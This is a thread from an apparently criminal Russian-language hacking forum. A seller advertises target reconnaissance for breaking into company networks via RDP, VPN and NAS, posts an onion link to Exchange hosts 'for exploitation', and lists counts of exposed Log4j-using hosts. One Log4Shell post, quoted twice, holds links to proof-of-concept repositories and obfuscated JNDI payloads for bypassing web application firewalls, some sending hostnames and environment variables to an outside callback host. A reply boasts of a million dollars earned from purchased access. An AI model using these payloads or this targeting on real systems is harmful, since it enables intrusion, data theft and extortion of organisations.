What's new
Runion

This is a sample guest message. Register a free account today to become a member! Once signed in, you'll be able to participate on this site by adding your own topics and posts, as well as connect with other members through your own private inbox!

Свежий материал для Exploits. IP 2 CVE / 0.0.0.0 - 255.255.255.255

marmalade

Midle Weight
Депозит
$0
JitteryPlasticBactrian-size_restricted.gif



Нужно получить доступ в сеть компании?
Открыть чужой рабочий стол по RDP или ворваться в корпоративный VPN?
А может заглянуть в NAS хранилище компании за бекапами?

Найду IP:port / Doman / CMS / Emails / Админки во всем интернете, именно те, что вам нужно.

Цена: от 50$ за простую выгрузку. Обагощаю данные слоями!

Опционально:
  • Check и верификация уязвимостей (приват и паблик CVE)​
  • Отфильтрую денежные хосты IP/domain 2 Revenue по Zoominfo.com
  • Прочекаю хосты/домены на CMS и стек технологий​
  • OSINT целей - найду корпоративные и личные email сотрудников​
Также, в наличие API ключи Shodan/Zoomeye/Fofa и др.
Связь PM, отвечаю быстро.

Пример топ базы:

report-scrn1.png

report-scrn2.png

report-scrn3.png
 

База хостов Microsoft Exchange для экплуатации​

Более 18% Exchange серверов остаются не запатченными и уязвимыми к ProxyShell.
40% подвержены уязвимости CVE-2021-31206

Бесплатная база выложена здесь:
http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion/threads/55232/

1628923335400.png



И это факт уже освещен и получил дополнительное внимание в медиа:

1629360301200.png
 
взял под свой запрос. все быстро. 50$ не велики денжища
 
shodan не владеет полным списком, есть более изащерёный способ через nmap и добычей айпи через базу по странам и регионам.
 
wav сказал(а):
shodan не владеет полным списком, есть более изащерёный способ через nmap и добычей айпи через базу по странам и регионам.
Нажмите, чтобы раскрыть...
Ну да, не все хосты есть в Шодане. А вот в nmap нет ничего изащренного, как по мне. Просьба не разводить флейм. Тема только для отзывов и весомых комментариев.

Помимо Shodan, есть Zoomeye, Fofa, Censys и другие, где разные технологии и база данных хостов. Некоторые, просто не могут быстро или много сканировать, поэтому между ними будут отличие в 10-20% и чтобы собрать полную базу, нужно иметь в каждом аккаунты, выгружать их базу и совмещать, удаляя дубликаты.

Вложения​

  • shops-scan-magento.png
    shops-scan-magento.png
    40.5 КБ · Просмотры: 1 297
 
itś cheaper than buying a cracked shodan token, however it would be nice to have one with maltego and shodan transforms
 
marmalade_knight сказал(а):
Давайте просто сравним FOFA и Shodan на одном ip range (shodan не поддерживает CIDR нотацию)
Shodan: 7,935 FOFA: 20,196
Более чем в 2 раза. И это без исторических данных FOFA
Нажмите, чтобы раскрыть...
Там ещё когда шодан начинаешь скачивать выясняется на самом деле хостов меньше чем он пишет в веб-поисковике :D
Я думаю что админы научились блокировать шодан а вот про фофу никто не слышал ничего.
Кстати есть ещё binaryedge.io
 
photo1639487813.jpg



Log4Shell - RCE 0-day exploit in log4j 2, a popular Java logging package.

Обычно установлен на:

Apache Struts
Apache Solr
Apache Druid
Apache Flink

А так же:

GitHub - YfryTchsGD/Log4jAttackSurface

Contribute to YfryTchsGD/Log4jAttackSurface development by creating an account on GitHub.
github.com

Writeups:

Log4Shell: RCE 0-day exploit found in log4j, a popular Java logging package | LunaTrace

Given how ubiquitous log4j is, the impact of this vulnerability is quite severe. Learn how to fix Log4Shell, why it's bad, and what a working exploit requires in this post.
www.lunasec.io
www.lunasec.io
www.randori.com

IBM Randori Recon

Learn about attack surface management SaaS that continuously monitors to look for unexpected changes, blind spots, misconfigurations and process failures.
www.randori.com

PoC's:

github.com

GitHub - tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce: Apache Log4j 远程代码执行

Apache Log4j 远程代码执行. Contribute to tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce development by creating an account on GitHub.
github.com

GitHub - YfryTchsGD/Log4jAttackSurface

Contribute to YfryTchsGD/Log4jAttackSurface development by creating an account on GitHub.
github.com
github.com

GitHub - xiajun325/apache-log4j-rce-poc

Contribute to xiajun325/apache-log4j-rce-poc development by creating an account on GitHub.
github.com
github.com

GitHub - udoless/apache-log4j-rce-poc

Contribute to udoless/apache-log4j-rce-poc development by creating an account on GitHub.
github.com

Detection:

Log4j RCE CVE-2021-44228 Exploitation Detection

Log4j RCE CVE-2021-44228 Exploitation Detection. GitHub Gist: instantly share code, notes, and snippets.
gist.github.com


Здесь списки забаненых хостов которые эксплоатируют Log4Shell

GreyNoise

At GreyNoise, we collect and analyze untargeted, widespread, and opportunistic scan and attack activity that reaches every server directly connected to the Internet.
www.greynoise.io

CF bypass:
${jndi:dns://aeutbj.example.com/ext}
${jndi:${lower:l}${lower:d}a${lower:p}://example.com/

WAF bypass:
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::p}://${hostName}.${env:COMPUTERNAME}.${env:USERDOMAIN}.${env}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
 
Замотался и все забывал выложить софт с log4j для эксплоатации log4shell. Сделал небольшую подборку 34 софта из 100 в которых стоит эта либа.
Поделюсь в ПМ небольшой пачкой хостов по каждому софту для тестов

Log4j Software list:

Hosts - Software

86908 - APACHE-ActiveMQ
895 - Apache_OFBiz
2006 - APACHE-Zeppelin
36585 - 泛微-协同办公OA
237 - 致远互联-FE
5444 - 泛微-E-Weaver
45404 - 致远互联-OA
8101 - 用友-UFIDA-NC
2 - jeewms
3861 - vmware-Workspace-ONE-Access
99 - vmware-vRealize-Automation-Appliance
7976 - JAMES-Mail-Server
17292 - APACHE-Shiro
14394 - APACHE-dubbo
1003878 - vmware-SpringBoot-Framework
1023 - JEECMS
672 - Zipkin
1 - FORESCOUT-Administration
7259 - APACHE-hadoop-YARN
665 - APACHE-Storm
3599 - 用友-NC-Cloud
143 - vmware-vRealize-Log-Insight
660 - APACHE-Druid
494 - Firehose_SERVICE_MONITORING
173 - APACHE-Unomi
54405 - RedHat-Jboss
55990 - Oracle-Weblogic_interface_7001
5 - druid-server
96129 - elastic-Elasticsearch
377 - elastic-Elasticsearch-Engineer
12 - Oracle-BI-Publisher-Enterprise
258 - vRealize-Operations-Tenant-App
78154 - RedHat-JBoss-AS
87791 - UNIFI-unifi-摄像头
 
marmalade_knight сказал(а):

Database of Microsoft Exchange hosts for exploitation​

More than 18% of Exchange servers remain unpatched and vulnerable to ProxyShell.
40% are affected by CVE-2021-31206

The free base is posted here:
http://xssforumv3isucukbxhdhwz67hoa5e2voakcfkuieq4ch257vsburuid.onion/threads/55232/

Посмотреть вложение 25795

And this fact has already been covered and received additional attention in the media:

Посмотреть вложение 25995
Нажмите, чтобы раскрыть...
bro please can you give the new link ? the old link is expired (((
 
wow thank you for this useful info. I very much appreciate it and i'm sure many others do as well!
marmalade_knight сказал(а):
photo1639487813.jpg



Log4Shell - RCE 0-day exploit in log4j 2, a popular Java logging package.

Обычно установлен на:

Apache Struts
Apache Solr
Apache Druid
Apache Flink

А так же:

GitHub - YfryTchsGD/Log4jAttackSurface

Contribute to YfryTchsGD/Log4jAttackSurface development by creating an account on GitHub.
github.com

Writeups:

Log4Shell: RCE 0-day exploit found in log4j, a popular Java logging package | LunaTrace

Given how ubiquitous log4j is, the impact of this vulnerability is quite severe. Learn how to fix Log4Shell, why it's bad, and what a working exploit requires in this post.
www.lunasec.io
www.lunasec.io
www.randori.com

IBM Randori Recon

Learn about attack surface management SaaS that continuously monitors to look for unexpected changes, blind spots, misconfigurations and process failures.
www.randori.com
PoC's:

github.com

GitHub - tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce: Apache Log4j 远程代码执行

Apache Log4j 远程代码执行. Contribute to tangxiaofeng7/CVE-2021-44228-Apache-Log4j-Rce development by creating an account on GitHub.
github.com

GitHub - YfryTchsGD/Log4jAttackSurface

Contribute to YfryTchsGD/Log4jAttackSurface development by creating an account on GitHub.
github.com
github.com

GitHub - xiajun325/apache-log4j-rce-poc

Contribute to xiajun325/apache-log4j-rce-poc development by creating an account on GitHub.
github.com
github.com

GitHub - udoless/apache-log4j-rce-poc

Contribute to udoless/apache-log4j-rce-poc development by creating an account on GitHub.
github.com

Detection:

gist.github.com

Log4j RCE CVE-2021-44228 Exploitation Detection

Log4j RCE CVE-2021-44228 Exploitation Detection. GitHub Gist: instantly share code, notes, and snippets.
gist.github.com


Здесь списки забаненых хостов которые эксплоатируют Log4Shell

GreyNoise

At GreyNoise, we collect and analyze untargeted, widespread, and opportunistic scan and attack activity that reaches every server directly connected to the Internet.
www.greynoise.io

CF bypass:
${jndi:dns://aeutbj.example.com/ext}
${jndi:${lower:l}${lower:d}a${lower:p}://example.com/

WAF bypass:
${jndi:ldap://127.0.0.1:1389/ badClassName}
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}ndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${jndi:rmi://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${lower:jndi}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:${lower:jndi}}:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:jndi}:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${lower:d}i:${upper:rmi}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${upper:j}${upper:n}${upper:d}${upper:i}:${lower:r}m${lower:i}}://nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk/sploit}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${upper::-j}${upper::-n}${::-d}${upper::-i}:${upper::-l}${upper::-d}${upper::-a}${upper::p}://${hostName}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
${${::-j}${::-n}${::-d}${::-i}:${::-l}${::-d}${::-a}${::p}://${hostName}.${env:COMPUTERNAME}.${env:USERDOMAIN}.${env}.nsvi5sh112ksf1bp1ff2hvztn.l4j.zsec.uk}
Нажмите, чтобы раскрыть...
 
wav сказал(а):
shodan не владеет полным списком, есть более изащерёный способ через nmap и добычей айпи через базу по странам и регионам.
Нажмите, чтобы раскрыть...
Почему изощренный?
 
Закупился матом по форти и цискарям - лутнул ровно лям зелени. Материал божественный! Закупаю следующую партейку!
 
2 статейки рекомендуются к прочтению. По сути без разницы какую цифру шодан показывает, она не как к реальности не относится.

vulncheck.com

There Are Too Many Damn Honeypots - Blog - VulnCheck

VulnCheck faces a horde of honeypots while assessing the potential impact of Atlassian Confluence's CVE-2023-22527. This blog delves into Shodan queries to filter out honeypots and uncover the actual on-premise Confluence install base.
vulncheck.com
vulncheck.com
vulncheck.com

A Log4Shell Retrospective - Overblown and Exaggerated - Blog - VulnCheck

Log4Shell was proclaimed one of the most critical vulnerabilities, but in this blog, VulnCheck challenges that perspective, revealing the limited number of vulnerable systems still present two years after the initial disclosure.
vulncheck.com
vulncheck.com
 
Top